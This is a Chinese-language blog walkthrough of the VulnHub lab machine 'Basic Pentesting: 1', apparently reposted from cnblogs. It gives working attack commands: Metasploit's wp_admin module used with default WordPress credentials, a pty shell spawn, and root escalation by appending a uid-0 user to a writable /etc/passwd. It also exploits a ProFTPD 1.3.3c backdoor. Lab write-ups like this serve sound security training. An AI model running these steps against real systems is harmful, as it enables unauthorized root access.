首页 > 其他 > 详细

Basic Pentesting: 1

时间:2020-12-30 22:17:49      阅读:59      评论:0      收藏:0      [点我收藏+]

靶机地址:https://www.vulnhub.com/entry/basic-pentesting-1,216/

 

用nmap获取靶机IP:192.168.40.185

nmap -sP 192.168.40.0/24

技术分享图片

 获取靶机开放的端口,可以看到靶机开放了 21、22、80 端口

技术分享图片

 访问80端口,没有太大发现,用dirb扫描目录,发现该网站是wordpress搭建的

技术分享图片

 直接找到登录框,对着登录框来一发 admin/admin,然后就进去了。。。那就可以用msf的wp_admin了

技术分享图片

use 0
set username admin
set password admin
set rhosts 192.168.40.185
set targeturi /secret
run

技术分享图片

 用python开一个交互式tty

python -c import pty;pty.spawn("/bin/bash")

发现 passwd 是可写的,那么就可以伪造一个uid为0的用户来达到提权

技术分享图片

 用 kali 的 openssl来生成密码

openssl passwd -1 -salt test_user 123456

技术分享图片

 写入到靶机的 /etc/passwd 文件上

echo test_user:$1$test_use$tAETsIOMgxhqU.wHnp0XA0:0:0:/root:/bin/bash >> /etc/passwd

技术分享图片

 切换用户,成功提权

技术分享图片

 

方法二:

扫端口的时候发现了21端口也开放了,而且是ProFTPD  1.3.3c ,尝试寻找这个服务的漏洞

技术分享图片

 该服务存在后门命令执行,用msf来利用漏洞

技术分享图片

 连接上去直接是root权限

技术分享图片

 

Basic Pentesting: 1

原文:https://www.cnblogs.com/gaonuoqi/p/14213409.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!